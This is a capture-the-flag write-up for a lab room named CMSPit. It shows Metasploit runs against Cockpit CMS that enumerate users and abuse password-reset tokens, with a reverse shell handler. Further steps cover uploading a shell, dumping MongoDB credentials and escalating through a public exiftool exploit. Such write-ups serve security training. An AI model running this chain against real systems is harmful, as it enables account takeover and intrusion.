
CMSPit

Room CMSPit
Difficulty Medium
Type Web
Author stuxnet

Nmap

I was trying to find the version in the source code

```
curl "http://10.10.35.116/auth/login?to=/auth/l" | grep "0."
csfr : "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.dlnu8XjKIvB6mGfBlOgjtnixirAIsnzf5QTAEP1mJJc"
```

Found this https://swarm.ptsecurity.com/rce-cockpit-cms/ then this

## Metasploit

```
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 10.9.148.82:4444
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "darkStar7471", "skidy", "ekoparty"]
[-] Exploit aborted due to failure: bad-config: 10.10.35.116:80 - User to exploit required
[*] Exploit completed, but no session was created.
```

Users:

  • admin
  • darkStar7471
  • skidy
  • ekoparty

change the password by adding the user parameter (must run first with admin)

```
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 10.9.148.82:4444
[*] Obtaining reset tokens (CVE-2020-35847)
[*] Attempting to generate tokens
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c"]
[*] Checking token: rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c
[*] Obtaining user info
[*]   user: skidy
[*]   email: skidy@tryhackme.fakemail
[*]   active: true
[*]   group: admin
[*]   i18n: en
[*]   api_key: account-21ca3cfc400e3e565cfcb0e3f6b96d
[*]   password: $2y$10$sH3eBPcn3NLdg2mF8NbceOk7dZy4MEf2qnky4Byxi/MDKJRl9odwi
[*]   name: Skidy
[*]   _modified: 1621719311
[*]   _created: 1621719311
[*]   _id: 60a9790f393037a2e400006a
[*]   _reset_token: rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c
[*]   md5email: 5dfac21f8549f298b8ee60e4b90c0e66
[+] Changing password to aVT3ukBAu8
[+] Password update successful
[*] Attempting login
[-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[*] Exploit completed, but no session was created.
```

upload shell as asset and open it using the link symbol

`ss -tulnp`: 27017 is the default port of the Mongo database

extract creds

```
mongo
show dbs
use sudouserbak
show collections
db.flag.find()
db.user.find()
```

```
{ "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "p4ssw0rdhack3d!123" }
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }
```

User: stux Password: p4ssw0rdhack3d!123

ssh into stux

use this tool to exploit https://github.com/convisoappsec/CVE-2021-22204-exiftool

just upload an image and run sudo exiftool image.jpg
